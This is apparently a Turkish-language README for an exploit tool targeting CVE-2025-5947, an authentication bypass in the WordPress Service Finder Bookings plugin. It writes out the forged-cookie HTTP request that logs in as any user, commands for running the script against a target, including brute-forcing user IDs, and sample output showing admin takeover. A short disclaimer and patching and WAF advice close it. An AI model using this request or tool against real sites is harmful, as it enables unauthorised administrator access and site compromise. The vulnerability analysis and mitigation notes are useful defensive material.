xxconi/CVE-2025-5947

# CVE-2025-5947 CVE-2025-5947 WordPress Service Finder Bookings ≤ 6.0 Exploit # CVE-2025-5947 Exploit - Service Finder Bookings     ## 📋 İçindekiler - [Açık Hakkında](#açık-hakkında) - [Teknik Detaylar](#teknik-detaylar) - [Kurulum](#kurulum) - [Kullanım](#kullanım) - [Örnekler](#örnekler) - [Sonuçlar](#sonuçlar) - [Güvenlik](#güvenlik) - [Kaynaklar](#kaynaklar) ## 🔴 Açık Hakkında ### CVE-2025-5947 **Service Finder Bookings** WordPress eklentisinin 6.0 ve önceki sürümlerinde kritik bir kimlik doğrulama bypass açığı bulunmaktadır. | Özellik | Değer | |---------|-------| | **CVE ID** | CVE-2025-5947 | | **Eklenti** | Service Finder Bookings (sf-booking) | | **Etkilenen Versiyon** | ≤ 6.0 | | **Şiddet** | 🔴 **KRİTİK** | | **CVSS Skoru** | 9.8 | | **CWE** | CWE-639 (Authorization Bypass) | | **EPSS Skoru** | 0.617 (98.357 persentil) | | **Yayın Tarihi** | 2025 | ### 🎯 Etki Kimlik doğrulaması olmayan saldırganlar: - ✅ Herhangi bir kullanıcı olarak giriş yapabilir - ✅ Admin hesaplarına erişim sağlayabilir - ✅ Tam sistem kontrolü elde edebilir - ✅ Veri sızıntısı yapabilir - ✅ Zararlı kod yükleyebilir ## 🔍 Teknik Detaylar ### Açığın Nedeni `service_finder_switch_back()` fonksiyonunda **yetersiz cookie doğrulaması** vardır: // Güvenli olmayan kod if(isset($_COOKIE['original_user_id'])) { $user_id = $_COOKIE['original_user_id']; wp_set_current_user($user_id); // Doğrulama yok! } ### Saldırı Vektörü GET /wp-admin/admin-ajax.php?action=service_finder_switch_back HTTP/1.1 Host: target.com Cookie: original_user_id=1 **Saldırı Özellikleri:** - 🌐 Uzaktan Erişim (AV:N) - 🔓 Kimlik Doğrulama Yok (PR:N) - 👤 Kullanıcı Etkileşimi Yok (UI:N) - 📊 Tam Etki (C:H, I:H, A:H) ## 📦 Kurulum ### Gereksinimler - Python 3.6+ - requests kütüphanesi ### Adım 1: Repository'yi Klonla git clone https://github.com/xxconi/CVE-2025-5947.git cd CVE-2025-5947 ### Adım 2: Bağımlılıkları Yükle pip install -r requirements.txt ### Adım 3: Çalıştır python exploit.py -u http://target.com ## 🚀 Kullanım ### Temel Komutlar # Yardım göster python exploit.py -h # Admin (ID=1) olarak giriş dene python exploit.py -u http://target.com # Belirli kullanıcı ID'si ile python exploit.py -u http://target.com -i 5 # Brute force (ID 1-10) python exploit.py -u http://target.com -b 1-10 # SSL doğrulaması olmadan python exploit.py -u http://target.com --no-ssl-verify # Özel timeout ile python exploit.py -u http://target.com -t 30 ### Parametreler | Parametre | Kısaltma | Açıklama | Varsayılan | |-----------|----------|---------|-----------| | `--url` | `-u` | Hedef URL (zorunlu) | - | | `--user-id` | `-i` | Kullanıcı ID | 1 | | `--brute-force` | `-b` | Brute force aralığı (1-10) | - | | `--no-ssl-verify` | - | SSL doğrulamasını devre dışı bırak | False | | `--timeout` | `-t` | İstek timeout (saniye) | 10 | ## 💡 Örnekler ### Örnek 1: Basit Exploit python exploit.py -u http://wordpress.local **Çıktı:** ============================================================ CVE-2025-5947 Service Finder Bookings Exploit Authentication Bypass via Cookie Spoofing ============================================================ ✅ Service Finder Bookings eklentisi bulundu 🔍 Kullanıcı ID 1 ile giriş denemesi yapılıyor... 📊 HTTP Status: 302 📋 Response Headers: Location: http://wordpress.local/wp-admin/ Set-Cookie: wordpress_logged_in_abc123=... ✅ BAŞARILI! Admin olarak giriş yapıldı! 📍 Yönlendirme: http://wordpress.local/wp-admin/ ### Örnek 2: Brute Force python exploit.py -u http://target.com -b 1-20 **Çıktı:** 🔄 Brute Force Başlıyor (20 kullanıcı)... ✅ Kullanıcı ID 1: BAŞARILI ❌ Kullanıcı ID 2: Başarısız ✅ Kullanıcı ID 3: BAŞARILI ... ✅ Başarılı Kullanıcılar: [1, 3, 5] ### Örnek 3: HTTPS ile SSL Doğrulaması Olmadan python exploit.py -u https://target.com --no-ssl-verify ## 📊 Sonuçlar Başarılı exploit şu göstergeleri içerir: ✅ HTTP 301 veya 302 yanıt kodu ✅ `Location` header'ında `/wp-admin/` bulunması ✅ `Set-Cookie` header'ında `wordpress_logged_in_` bulunması ## 🛡️ Güvenlik ### ⚠️ Yasal Uyarı **Bu araç yalnızca:** - ✅ Yetkili güvenlik testleri için - ✅ Kendi sistemlerinizde - ✅ Yazılı izin ile **Kullanılmalıdır. Yazarı sorumlu değildir.** ### 🔐 Korunma Yolları 1. **Acil Güncelleme** # WordPress admin panelinden güncelle # veya WP-CLI ile wp plugin update sf-booking 2. **Eklentiyi Devre Dışı Bırak** wp plugin deactivate sf-booking 3. **Eklentiyi Kaldır** wp plugin delete sf-booking 4. **Web Application Firewall (WAF)** Block: /wp-admin/admin-ajax.php?action=service_finder_switch_back 5. **Güvenlik Kontrolü** - Admin hesaplarını kontrol et - Erişim loglarını incele - Yetkisiz giriş araştır ## 📚 Kaynaklar - [Patchstack Veritabanı](https://patchstack.com/database/wordpress/plugin/sf-booking/vulnerability/wordpress-service-finder-bookings-plugin-6-0-authentication-bypass-via-user-switch-cookie-vulnerability) - [GitHub Advisory](https://github.com/advisories/GHSA-x2xx-4qhp-2vqx) - [NVD Detayları](https://nvd.nist.gov/vuln/detail/CVE-2025-5947) - [Orijinal Exploit](https://github.com/M4rgs/CVE-2025-5947_Exploit) - [CVSS Calculator](https://www.first.org/cvss/calculator/3.1) ## 🤝 Katkıda Bulunma Hataları bildirmek veya geliştirmeler önerlemek için: 1. Fork'la 2. Feature branch oluştur (`git checkout -b feature/improvement`) 3. Commit et (`git commit -am 'Add improvement'`) 4. Push et (`git push origin feature/improvement`) 5. Pull Request aç ## 📄 Lisans MIT License - Detaylar için [LICENSE](LICENSE) dosyasına bakın ## 👤 Yazar **Security Researcher** - GitHub: [@yourusername](https://github.com/xxconi) ## 🙏 Teşekkürler - Patchstack Security Team - WordPress Security Community - CVE Coordinators